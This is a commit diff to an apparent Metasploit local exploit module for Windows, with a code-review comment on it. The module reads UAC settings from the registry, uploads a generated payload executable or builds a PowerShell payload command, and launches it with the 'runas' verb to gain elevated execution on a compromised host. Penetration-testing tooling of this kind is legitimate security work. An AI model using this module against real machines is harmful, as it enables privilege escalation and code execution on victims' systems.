
Commit 6881774

committed
Updated with comments from jlee-r7 and Meatballs1
Added fail_with instead of just print_error; figured out a way to execute the cmd_psh_payload without using gsub; added a case statement for datastore['TECHNIQUE'].
1 parent a5dc75a commit 6881774

1 file changed

+25
-44
lines changed

1 file changed

+25
-44
lines changed

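--- a/modules/exploits/windows/local/ask.rb
+++ b/modules/exploits/windows/local/ask.rb
@@ -42,14 +42,13 @@ def initialize(info={})
 register_options([
 OptString.new("FILENAME", [ false, "File name on disk"]),
 OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]),
-OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", false ]),
+OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ]),
 OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'EXE', ['PSH', 'EXE'] ]),
 ])
 
 end
 
 def exploit
-
 root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System")
 open_key = session.sys.registry.open_key(root_key, base_key)
 lua_setting = open_key.query_value('EnableLUA')
@@ -63,56 +62,38 @@ def exploit
 uac_level = open_key.query_value('ConsentPromptBehaviorAdmin')
 
 case uac_level.data
-when 2
-print_status "UAC is set to 'Always Notify'"
-print_status "The user will be prompted, wait for them to click 'Ok'"
-when 5
-print_debug "UAC is set to Default"
-print_debug "The user will be prompted, wait for them to click 'Ok'"
-when 0
-print_good "UAC is not enabled, no prompt for the user"
+when 2
+print_status "UAC is set to 'Always Notify'"
+print_status "The user will be prompted, wait for them to click 'Ok'"
+when 5
+print_debug "UAC is set to Default"
+print_debug "The user will be prompted, wait for them to click 'Ok'"
+when 0
+print_good "UAC is not enabled, no prompt for the user"
 end
 
-
 #
 # Generate payload and random names for upload
 #
-
-if datastore["TECHNIQUE"] == "EXE"
-if datastore["UPLOAD"]
-exe_payload = generate_exe_payload_exe
-
-if datastore["FILENAME"]
-payload_filename = datastore["FILENAME"]
-else
-payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
-end
-
-if datastore["PATH"]
-payload_path = datastore["PATH"]
-else
-payload_path = session.fs.file.expand_path("%TEMP%")
-end
-
+case datastore["TECHNIQUE"]
+when "EXE"
+exe_payload = generate_payload_exe
+payload_filename = datastore["FILENAME"] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+payload_path = datastore["PATH"] || expand_path("%TEMP%")
 cmd_location = "#{payload_path}\\#{payload_filename}"
-
 if datastore["UPLOAD"]
 print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...")
-fd = session.fs.file.new(cmd_location, "wb")
-fd.write(exe_payload)
-fd.close
+write_file(cmd_location, exe_payload)
+else
+#print_error("No Upload Path!")
+fail_with(Exploit::Failure::BadConfig, "No Upload Path!")
+return
 end
-
-session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5)
-else
-print_error("No Upload Path!")
-return
-end
-else
-command = cmd_psh_payload(payload.encoded)
-arguments = command.gsub("%COMSPEC% /B /C start powershell.exe ","")
-session.railgun.shell32.ShellExecuteA(nil,"runas","powershell.exe","#{arguments}",nil,5)
+command, args = cmd_location,nil
+session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5)
+when "PSH"
+command, args = "cmd.exe", " /c #{cmd_psh_payload(payload.encoded)}"
 end
+session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5)
 end
-end
-
+end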
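Review bot: The `when "EXE"` branch in the second hunk ends with its own `session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5)` (new line 93), and the identical call is repeated at new line 97 after the `case`, so for TECHNIQUE=EXE the same command is issued twice; the copy inside the branch should go, leaving the single post-`case` call that the PSH branch already relies on. In the `else` arm of `if datastore["UPLOAD"]`, `fail_with` raises rather than returning, so the `return` after it is unreachable and the commented-out `#print_error("No Upload Path!")` is leftover debris; both can be deleted. The message also misstates the condition — nothing is missing a path, the option UPLOAD is simply false while the EXE technique needs a file on disk — so `fail_with(Exploit::Failure::BadConfig, "TECHNIQUE=EXE requires UPLOAD=true")` would describe the misconfiguration accurately. The `exploit` method begins before this hunk.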
